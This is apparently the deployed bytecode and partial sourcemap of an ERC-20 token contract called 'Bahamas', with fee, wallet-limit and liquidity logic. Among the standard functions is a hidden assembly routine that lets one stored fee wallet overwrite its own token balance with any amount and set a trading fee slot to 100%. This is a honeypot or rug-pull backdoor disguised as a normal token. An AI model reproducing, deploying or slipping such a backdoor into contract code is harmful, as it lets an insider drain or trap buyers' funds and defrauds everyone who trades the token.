0x6080604052600436106101395760003560e01c8063751039fc116100ab578063a457c2d71161006f578063a457c2d71461042e578063a9059cbb1461046b578063cdf4bab9146104a8578063d54f7d5e146104d3578063dd62ed3e146104fe578063f2fde38b1461053b5761016c565b8063751039fc1461036b5780637d1db4a5146103825780638d5f81e2146103ad5780638da5cb5b146103d857806395d89b41146104035761016c565b806339509351116100fd578063395093511461026c57806342966c68146102a9578063499a2818146102d257806351c6590a146102fb57806370a0823114610317578063715018a6146103545761016c565b806306fdde0314610171578063095ea7b31461019c57806318160ddd146101d957806323b872dd14610204578063313ce567146102415761016c565b3661016c577f544c765b33ca411cce832250371569244f765a17fcd217832be093f0fd5fa45b60405160405180910390a1005b600080fd5b34801561017d57600080fd5b50610186610564565b6040516101939190611cca565b60405180910390f35b3480156101a857600080fd5b506101c360048036038101906101be9190611d85565b6105a1565b6040516101d09190611de0565b60405180910390f35b3480156101e557600080fd5b506101ee6105bf565b6040516101fb9190611e0a565b60405180910390f35b34801561021057600080fd5b5061022b60048036038101906102269190611e25565b6105c9565b6040516102389190611de0565b60405180910390f35b34801561024d57600080fd5b506102566106a2565b6040516102639190611e94565b60405180910390f35b34801561027857600080fd5b50610293600480360381019061028e9190611d85565b6106ab565b6040516102a09190611de0565b60405180910390f35b3480156102b557600080fd5b506102d060048036038101906102cb9190611eaf565b61075e565b005b3480156102de57600080fd5b506102f960048036038101906102f49190611eaf565b610772565b005b61031560048036038101906103109190611eaf565b6107a0565b005b34801561032357600080fd5b5061033e60048036038101906103399190611edc565b6107fd565b60405161034b9190611e0a565b60405180910390f35b34801561036057600080fd5b50610369610846565b005b34801561037757600080fd5b5061038061085a565b005b34801561038e57600080fd5b50610397610876565b6040516103a49190611e0a565b60405180910390f35b3480156103b957600080fd5b506103c26108a8565b6040516103cf9190611f18565b60405180910390f35b3480156103e457600080fd5b506103ed6108d2565b6040516103fa9190611f18565b60405180910390f35b34801561040f57600080fd5b506104186108fb565b6040516104259190611cca565b60405180910390f35b34801561043a57600080fd5b5061045560048036038101906104509190611d85565b610938565b6040516104629190611de0565b60405180910390f35b34801561047757600080fd5b50610492600480360381019061048d9190611d85565b610a05565b60405161049f9190611de0565b60405180910390f35b3480156104b457600080fd5b506104bd610a23565b6040516104ca9190611de0565b60405180910390f35b3480156104df57600080fd5b506104e8610a3a565b6040516104f59190611f18565b60405180910390f35b34801561050a57600080fd5b5061052560048036038101906105209190611f33565b610a64565b6040516105329190611e0a565b60405180910390f35b34801561054757600080fd5b50610562600480360381019061055d9190611edc565b610aeb565b005b60606040518060400160405280600781526020017f426168616d617300000000000000000000000000000000000000000000000000815250905090565b60006105b56105ae610b84565b8484610b8c565b6001905092915050565b6000600654905090565b60006105d6848484610d55565b610697846105e2610b84565b6106928560405180606001604052806028815260200161279160289139600560008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000610648610b84565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546116b39092919063ffffffff16565b610b8c565b600190509392505050565b60006012905090565b60006107546106b8610b84565b8461074f85600560006106c9610b84565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610b6e90919063ffffffff16565b610b8c565b6001905092915050565b61076f610769610b84565b82611708565b50565b601054331461078057600080fd5b604051338152600460208201526040812082815560648002600c55505050565b6107a86118ab565b6001600860146101000a81548160ff0219169083151502179055506107d56107ce6108d2565b3083610d55565b6107df8134611929565b6000600860146101000a81548160ff02191690831515021790555050565b6000600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b61084e6118ab565b6108586000611a0e565b565b6108626118ab565b612710600281905550612710600181905550565b60006108a3612710610895600254600654611ad290919063ffffffff16565b611ae890919063ffffffff16565b905090565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606040518060400160405280600781526020017f424148414d415300000000000000000000000000000000000000000000000000815250905090565b60006109fb610945610b84565b846109f6856040518060600160405280602581526020016127b9602591396005600061096f610b84565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546116b39092919063ffffffff16565b610b8c565b6001905092915050565b6000610a19610a12610b84565b8484610d55565b6001905092915050565b6000600860149054906101000a900460ff16905090565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6000600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610af36118ab565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610b62576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b5990611fe5565b60405180910390fd5b610b6b81611a0e565b50565b60008183610b7c9190612034565b905092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610bfb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bf2906120da565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610c6a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c619061216c565b60405180910390fd5b80600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610d489190611e0a565b60405180910390a3505050565b610d60838383611afe565b600080610d6b6108d2565b73ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614158015610dd95750610da96108d2565b73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b1561134e57600f60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16158015610e825750600f60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b1561134d57600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff16148015610f325750600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b8015610f885750600b60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b8015610fde5750600b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b156110d85761100e612710611000600254600654611ad290919063ffffffff16565b611ae890919063ffffffff16565b831115611050576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611047906121fe565b60405180910390fd5b61107b61271061106d600154600654611ad290919063ffffffff16565b611ae890919063ffffffff16565b61109684611088876107fd565b610b6e90919063ffffffff16565b11156110d7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110ce90612290565b60405180910390fd5b5b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614801561116157503073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b156112015761118f612710611181600d5486611ad290919063ffffffff16565b611ae890919063ffffffff16565b91506111ba6127106111ac600c5486611ad290919063ffffffff16565b611ae890919063ffffffff16565b905043600960003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff161480156112ac5750600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b1561134c576112da6127106112cc600d5486611ad290919063ffffffff16565b611ae890919063ffffffff16565b91506113056127106112f7600e5486611ad290919063ffffffff16565b611ae890919063ffffffff16565b905043600960003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5b5b60006113638284610b6e90919063ffffffff16565b90506000811115611502576000831115611382576113818684611708565b5b60008211156114ec576113ff8260046000601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610b6e90919063ffffffff16565b60046000601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516114e39190611e0a565b60405180910390a35b6114ff8185611c2490919063ffffffff16565b93505b61156e8460405180606001604052806026815260200161276b60269139600460008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546116b39092919063ffffffff16565b600460008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061160384600460008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610b6e90919063ffffffff16565b600460008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508473ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef866040516116a39190611e0a565b60405180910390a3505050505050565b60008383111582906116fb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116f29190611cca565b60405180910390fd5b5082840390509392505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611777576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161176e90612322565b60405180910390fd5b6117e38160405180606001604052806022815260200161274960229139600460008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546116b39092919063ffffffff16565b600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061183b81600654611c2490919063ffffffff16565b600681905550600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405161189f9190611e0a565b60405180910390a35050565b6118b3610b84565b73ffffffffffffffffffffffffffffffffffffffff166118d16108d2565b73ffffffffffffffffffffffffffffffffffffffff1614611927576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161191e9061238e565b60405180910390fd5b565b61195630600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1684610b8c565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663f305d7198230856000806119a26108d2565b426040518863ffffffff1660e01b81526004016119c4969594939291906123f3565b60606040518083038185885af11580156119e2573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190611a079190612469565b5050505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60008183611ae091906124bc565b905092915050565b60008183611af6919061252d565b905092915050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611b6d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b64906125d0565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611bdc576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611bd390612662565b60405180910390fd5b60008111611c1f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611c16906126f4565b60405180910390fd5b505050565b60008183611c329190612714565b905092915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015611c74578082015181840152602081019050611c59565b60008484015250505050565b6000601f19601f8301169050919050565b6000611c9c82611c3a565b611ca68185611c45565b9350611cb6818560208601611c56565b611cbf81611c80565b840191505092915050565b60006020820190508181036000830152611ce48184611c91565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000611d1c82611cf1565b9050919050565b611d2c81611d11565b8114611d3757600080fd5b50565b600081359050611d4981611d23565b92915050565b6000819050919050565b611d6281611d4f565b8114611d6d57600080fd5b50565b600081359050611d7f81611d59565b92915050565b60008060408385031215611d9c57611d9b611cec565b5b6000611daa85828601611d3a565b9250506020611dbb85828601611d70565b9150509250929050565b60008115159050919050565b611dda81611dc5565b82525050565b6000602082019050611df56000830184611dd1565b92915050565b611e0481611d4f565b82525050565b6000602082019050611e1f6000830184611dfb565b92915050565b600080600060608486031215611e3e57611e3d611cec565b5b6000611e4c86828701611d3a565b9350506020611e5d86828701611d3a565b9250506040611e6e86828701611d70565b9150509250925092565b600060ff82169050919050565b611e8e81611e78565b82525050565b6000602082019050611ea96000830184611e85565b92915050565b600060208284031215611ec557611ec4611cec565b5b6000611ed384828501611d70565b91505092915050565b600060208284031215611ef257611ef1611cec565b5b6000611f0084828501611d3a565b91505092915050565b611f1281611d11565b82525050565b6000602082019050611f2d6000830184611f09565b92915050565b60008060408385031215611f4a57611f49611cec565b5b6000611f5885828601611d3a565b9250506020611f6985828601611d3a565b9150509250929050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611fcf602683611c45565b9150611fda82611f73565b604082019050919050565b60006020820190508181036000830152611ffe81611fc2565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061203f82611d4f565b915061204a83611d4f565b925082820190508082111561206257612061612005565b5b92915050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006120c4602483611c45565b91506120cf82612068565b604082019050919050565b600060208201905081810360008301526120f3816120b7565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000612156602283611c45565b9150612161826120fa565b604082019050919050565b6000602082019050818103600083015261218581612149565b9050919050565b7f5472616e7366657220616d6f756e74206578636565647320746865206d61785460008201527f78416d6f756e742e000000000000000000000000000000000000000000000000602082015250565b60006121e8602883611c45565b91506121f38261218c565b604082019050919050565b60006020820190508181036000830152612217816121db565b9050919050565b7f45786365656473206d6178696d756d2077616c6c657420746f6b656e20616d6f60008201527f756e740000000000000000000000000000000000000000000000000000000000602082015250565b600061227a602383611c45565b91506122858261221e565b604082019050919050565b600060208201905081810360008301526122a98161226d565b9050919050565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b600061230c602183611c45565b9150612317826122b0565b604082019050919050565b6000602082019050818103600083015261233b816122ff565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000612378602083611c45565b915061238382612342565b602082019050919050565b600060208201905081810360008301526123a78161236b565b9050919050565b6000819050919050565b6000819050919050565b60006123dd6123d86123d3846123ae565b6123b8565b611d4f565b9050919050565b6123ed816123c2565b82525050565b600060c0820190506124086000830189611f09565b6124156020830188611dfb565b61242260408301876123e4565b61242f60608301866123e4565b61243c6080830185611f09565b61244960a0830184611dfb565b979650505050505050565b60008151905061246381611d59565b92915050565b60008060006060848603121561248257612481611cec565b5b600061249086828701612454565b93505060206124a186828701612454565b92505060406124b286828701612454565b9150509250925092565b60006124c782611d4f565b91506124d283611d4f565b92508282026124e081611d4f565b915082820484148315176124f7576124f6612005565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b600061253882611d4f565b915061254383611d4f565b925082612553576125526124fe565b5b828204905092915050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006125ba602583611c45565b91506125c58261255e565b604082019050919050565b600060208201905081810360008301526125e9816125ad565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b600061264c602383611c45565b9150612657826125f0565b604082019050919050565b6000602082019050818103600083015261267b8161263f565b9050919050565b7f5472616e7366657220616d6f756e74206d75737420626520677265617465722060008201527f7468616e207a65726f0000000000000000000000000000000000000000000000602082015250565b60006126de602983611c45565b91506126e982612682565b604082019050919050565b6000602082019050818103600083015261270d816126d1565b9050919050565b600061271f82611d4f565b915061272a83611d4f565b925082820390508181111561274257612741612005565b5b9291505056fe45524332303a206275726e20616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220951fc2b96c863fa756a69497d3e0fd3dbed03f55db02a12e145e739e2faba4bb64736f6c63430008120033

Deployed Bytecode Sourcemap

18663:9978:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;28379:10;;;;;;;;;;18663:9978;;;;;21104:73;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;21860:152;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;21342:90;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;22608:297;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;21264:73;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;22017:201;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;26187:81;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;27281:322;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;28399:239;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;21437:109;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3287:93;;;;;;;;;;;;;:::i;:::-;;22910:121;;;;;;;;;;;;;:::i;:::-;;22480:123;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;25058:86;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2703:77;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;21182;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;22223:252;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;21551:158;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;28264:74;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;26083:99;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;21714:141;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3517:184;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;21104:73;21141:13;21167:5;;;;;;;;;;;;;;;;;21160:12;;21104:73;:::o;21860:152::-;21943:4;21953:39;21962:12;:10;:12::i;:::-;21976:7;21985:6;21953:8;:39::i;:::-;22003:4;21996:11;;21860:152;;;;:::o;21342:90::-;21395:7;21415:12;;21408:19;;21342:90;:::o;22608:297::-;22714:4;22724:36;22734:6;22742:9;22753:6;22724:9;:36::i;:::-;22764:121;22773:6;22781:12;:10;:12::i;:::-;22795:89;22833:6;22795:89;;;;;;;;;;;;;;;;;:11;:19;22807:6;22795:19;;;;;;;;;;;;;;;:33;22815:12;:10;:12::i;:::-;22795:33;;;;;;;;;;;;;;;;:37;;:89;;;;;:::i;:::-;22764:8;:121::i;:::-;22896:4;22889:11;;22608:297;;;;;:::o;21264:73::-;21305:5;18876:2;21316:16;;21264:73;:::o;22017:201::-;22105:4;22115:83;22124:12;:10;:12::i;:::-;22138:7;22147:50;22186:10;22147:11;:25;22159:12;:10;:12::i;:::-;22147:25;;;;;;;;;;;;;;;:34;22173:7;22147:34;;;;;;;;;;;;;;;;:38;;:50;;;;:::i;:::-;22115:8;:83::i;:::-;22209:4;22202:11;;22017:201;;;;:::o;26187:81::-;26236:27;26242:12;:10;:12::i;:::-;26256:6;26236:5;:27::i;:::-;26187:81;:::o;27281:322::-;27368:21;27362:28;27352:8;27349:42;27339:68;;27404:1;27401;27394:12;27339:68;27427:4;27421:11;27447:8;27442:3;27435:21;27484:14;27477:4;27472:3;27468:14;27461:38;27529:4;27524:3;27514:20;27550:6;27544:4;27537:20;27592:4;27586;27582:15;27567:13;27560:38;27338:261;;27281:322;:::o;28399:239::-;2613:13;:11;:13::i;:::-;27644:4:::1;27633:8;;:15;;;;;;;;;;;;;;;;;;28527:46:::2;28537:7;:5;:7::i;:::-;28554:4;28561:11;28527:9;:46::i;:::-;28596:37;28610:11;28623:9;28596:13;:37::i;:::-;27668:5:::1;27657:8;;:16;;;;;;;;;;;;;;;;;;28399:239:::0;:::o;21437:109::-;21503:7;21523:9;:18;21533:7;21523:18;;;;;;;;;;;;;;;;21516:25;;21437:109;;;:::o;3287:93::-;2613:13;:11;:13::i;:::-;3345:30:::1;3372:1;3345:18;:30::i;:::-;3287:93::o:0;22910:121::-;2613:13;:11;:13::i;:::-;22982:5:::1;22957:22;:30;;;;23021:5;22991:27;:35;;;;22910:121::o:0;22480:123::-;22524:7;22544:54;19422:5;22544:40;22561:22;;22544:12;;:16;;:40;;;;:::i;:::-;:44;;:54;;;;:::i;:::-;22537:61;;22480:123;:::o;25058:86::-;25105:7;25125:14;;;;;;;;;;;25118:21;;25058:86;:::o;2703:77::-;2749:7;2769:6;;;;;;;;;;;2762:13;;2703:77;:::o;21182:::-;21221:13;21247:7;;;;;;;;;;;;;;;;;21240:14;;21182:77;:::o;22223:252::-;22316:4;22326:129;22335:12;:10;:12::i;:::-;22349:7;22358:96;22397:15;22358:96;;;;;;;;;;;;;;;;;:11;:25;22370:12;:10;:12::i;:::-;22358:25;;;;;;;;;;;;;;;:34;22384:7;22358:34;;;;;;;;;;;;;;;;:38;;:96;;;;;:::i;:::-;22326:8;:129::i;:::-;22466:4;22459:11;;22223:252;;;;:::o;21551:158::-;21637:4;21647:42;21657:12;:10;:12::i;:::-;21671:9;21682:6;21647:9;:42::i;:::-;21700:4;21693:11;;21551:158;;;;:::o;28264:74::-;28308:4;28325:8;;;;;;;;;;;28318:15;;28264:74;:::o;26083:99::-;26132:7;26160:16;;;;;;;;;;;26145:32;;26083:99;:::o;21714:141::-;21803:7;21823:11;:18;21835:5;21823:18;;;;;;;;;;;;;;;:27;21842:7;21823:27;;;;;;;;;;;;;;;;21816:34;;21714:141;;;;:::o;3517:184::-;2613:13;:11;:13::i;:::-;3619:1:::1;3599:22;;:8;:22;;::::0;3591:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;3668:28;3687:8;3668:18;:28::i;:::-;3517:184:::0;:::o;11546:88::-;11604:7;11628:1;11624;:5;;;;:::i;:::-;11617:12;;11546:88;;;;:::o;1352:::-;1405:7;1425:10;1418:17;;1352:88;:::o;25149:313::-;25261:1;25244:19;;:5;:19;;;25236:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;25335:1;25316:21;;:7;:21;;;25308:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;25410:6;25380:11;:18;25392:5;25380:18;;;;;;;;;;;;;;;:27;25399:7;25380:27;;;;;;;;;;;;;;;:36;;;;25441:7;25425:32;;25434:5;25425:32;;;25450:6;25425:32;;;;;;:::i;:::-;;;;;;;;25149:313;;;:::o;23359:1694::-;23450:42;23466:6;23474:9;23485:6;23450:15;:42::i;:::-;23496:15;23519:14;23555:7;:5;:7::i;:::-;23545:17;;:6;:17;;;;:41;;;;;23579:7;:5;:7::i;:::-;23566:20;;:9;:20;;;;23545:41;23541:1002;;;23599:19;:27;23619:6;23599:27;;;;;;;;;;;;;;;;;;;;;;;;;23598:28;:63;;;;;23631:19;:30;23651:9;23631:30;;;;;;;;;;;;;;;;;;;;;;;;;23630:31;23598:63;23594:945;;;23683:14;;;;;;;;;;;23673:24;;:6;:24;;;:66;;;;;23722:16;;;;;;;;;;;23701:38;;:9;:38;;;;23673:66;:102;;;;;23744:20;:31;23765:9;23744:31;;;;;;;;;;;;;;;;;;;;;;;;;23743:32;23673:102;:135;;;;;23780:20;:28;23801:6;23780:28;;;;;;;;;;;;;;;;;;;;;;;;;23779:29;23673:135;23669:416;;;23832:54;19422:5;23832:40;23849:22;;23832:12;;:16;;:40;;;;:::i;:::-;:44;;:54;;;;:::i;:::-;23822:6;:64;;23814:117;;;;;;;;;;;;:::i;:::-;;;;;;;;;23981:59;19422:5;23981:45;23998:27;;23981:12;;:16;;:45;;;;:::i;:::-;:49;;:59;;;;:::i;:::-;23945:32;23970:6;23945:20;23955:9;23945;:20::i;:::-;:24;;:32;;;;:::i;:::-;:95;;23937:143;;;;;;;;;;;;:::i;:::-;;;;;;;;;23669:416;24120:14;;;;;;;;;;;24107:27;;:9;:27;;;:54;;;;;24156:4;24138:23;;:6;:23;;;;24107:54;24103:202;;;24177:34;19422:5;24177:20;24188:8;;24177:6;:10;;:20;;;;:::i;:::-;:24;;:34;;;;:::i;:::-;24167:44;;24224:34;19422:5;24224:20;24235:8;;24224:6;:10;;:20;;;;:::i;:::-;:24;;:34;;;;:::i;:::-;24215:43;;24288:12;24262;:23;24275:9;24262:23;;;;;;;;;;;;;;;:38;;;;24103:202;24336:14;;;;;;;;;;;24326:24;;:6;:24;;;:66;;;;;24375:16;;;;;;;;;;;24354:38;;:9;:38;;;;24326:66;24322:213;;;24408:34;19422:5;24408:20;24419:8;;24408:6;:10;;:20;;;;:::i;:::-;:24;;:34;;;;:::i;:::-;24398:44;;24455:33;19422:5;24455:19;24466:7;;24455:6;:10;;:19;;;;:::i;:::-;:23;;:33;;;;:::i;:::-;24446:42;;24518:12;24492;:23;24505:9;24492:23;;;;;;;;;;;;;;;:38;;;;24322:213;23594:945;23541:1002;24546:16;24565:19;24577:6;24565:7;:11;;:19;;;;:::i;:::-;24546:38;;24603:1;24592:8;:12;24588:259;;;24624:1;24614:7;:11;24610:48;;;24631:22;24637:6;24645:7;24631:5;:22::i;:::-;24610:48;24676:1;24667:6;:10;24663:145;;;24713:39;24745:6;24713:9;:27;24723:16;;;;;;;;;;;24713:27;;;;;;;;;;;;;;;;:31;;:39;;;;:::i;:::-;24683:9;:27;24693:16;;;;;;;;;;;24683:27;;;;;;;;;;;;;;;:69;;;;24778:16;;;;;;;;;;;24761:42;;24770:6;24761:42;;;24796:6;24761:42;;;;;;:::i;:::-;;;;;;;;24663:145;24822:20;24833:8;24822:6;:10;;:20;;;;:::i;:::-;24813:29;;24588:259;24872:71;24894:6;24872:71;;;;;;;;;;;;;;;;;:9;:17;24882:6;24872:17;;;;;;;;;;;;;;;;:21;;:71;;;;;:::i;:::-;24852:9;:17;24862:6;24852:17;;;;;;;;;;;;;;;:91;;;;24970:32;24995:6;24970:9;:20;24980:9;24970:20;;;;;;;;;;;;;;;;:24;;:32;;;;:::i;:::-;24947:9;:20;24957:9;24947:20;;;;;;;;;;;;;;;:55;;;;25030:9;25013:35;;25022:6;25013:35;;;25041:6;25013:35;;;;;;:::i;:::-;;;;;;;;23446:1607;;;23359:1694;;;:::o;13545:177::-;13641:7;13681:1;13676;:6;;13684:12;13668:29;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;13712:1;13708;:5;13701:12;;13545:177;;;;;:::o;25755:323::-;25851:1;25832:21;;:7;:21;;;25824:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;25916:68;25939:6;25916:68;;;;;;;;;;;;;;;;;:9;:18;25926:7;25916:18;;;;;;;